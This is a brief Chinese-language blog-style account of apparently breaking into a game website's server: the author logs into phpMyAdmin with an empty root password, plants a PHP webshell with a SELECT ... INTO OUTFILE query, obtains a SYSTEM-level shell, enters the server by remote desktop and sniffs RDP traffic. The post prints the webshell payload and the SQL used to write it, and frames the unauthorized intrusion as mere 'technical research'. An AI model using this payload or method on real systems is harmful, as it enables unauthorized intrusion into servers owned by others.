某奇葩游戏站点服务器过程
目标:xxx游戏站
发现有phpmyadmin
没想到root空口令直接登录
这个管理员是真的有多危险
接下来就是找网站路径写马
运气太好
select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'XX'
不多说了,直接getshell了
发现既然是system权限,那么直接提权吧
找终端
经过判断,发现了终端
直接进服务器
嗅探到了几个rdp的东东,不玩了,就到这里
本文章只是技术研究,不做任何破坏
一个不会管理服务器的管理员是多么可怕